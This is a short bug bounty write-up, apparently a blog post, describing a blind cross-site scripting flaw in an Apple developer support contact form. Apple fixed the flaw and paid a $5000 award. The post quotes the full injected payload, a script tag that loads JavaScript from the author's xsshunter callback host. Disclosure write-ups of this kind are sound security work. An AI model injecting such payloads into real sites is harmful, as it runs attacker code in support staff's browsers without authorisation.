apple.com blind xss $5000

dimasaprilian993
2 min readMay 7, 2021

--

Hay there hope you all good , this my third time i write the story how i found some blind xss and got bounty $5000.

its a simple story , i just use knockpy to find some subdomain and than i chose one of many subdomain to be my target bughunting.

lets begin, i chose my target subdomain “ https://developer.apple.com”, i register some account there and login.

i look around at “ https://developer.apple.com” try to find some vulnerability there and i got nothing , im not giveup and continue to find some vulnerability, after many time to try i found some directory “https://developer.apple.com/contact/topic/select/SC1109/subtopic/select”,here i found some function where the user can send some question to support team,i click and insert my xsshunter payload “><script src=https://dimasaprilian993.xss.ht></script> and send to the support team.

suprise i got email notification from xsshunter if my payload execute there,

my lucky,after that I immediately sent some email to “product-security@apple.com” if i found some blind xss there with screenshot,dom and how to reproduce ,after a few days i got reply like this .

and then after a few weeks i got email again, they said if my finding is qualifies for the apple security bounty.

im really happy its my big award i ever got.

thanks again to the bugbounty comunity and all people help me .

TIMELINE

4 november 2020 : i sent email to aplle security

6 november 2020 : apple secuirty send me email

9 november 2020 : ask some update

10 november 2020 : still investigating my finding

12 november 2020 : give me award $5000

1 Mei 2021 : bug fixed and disclouse

--

--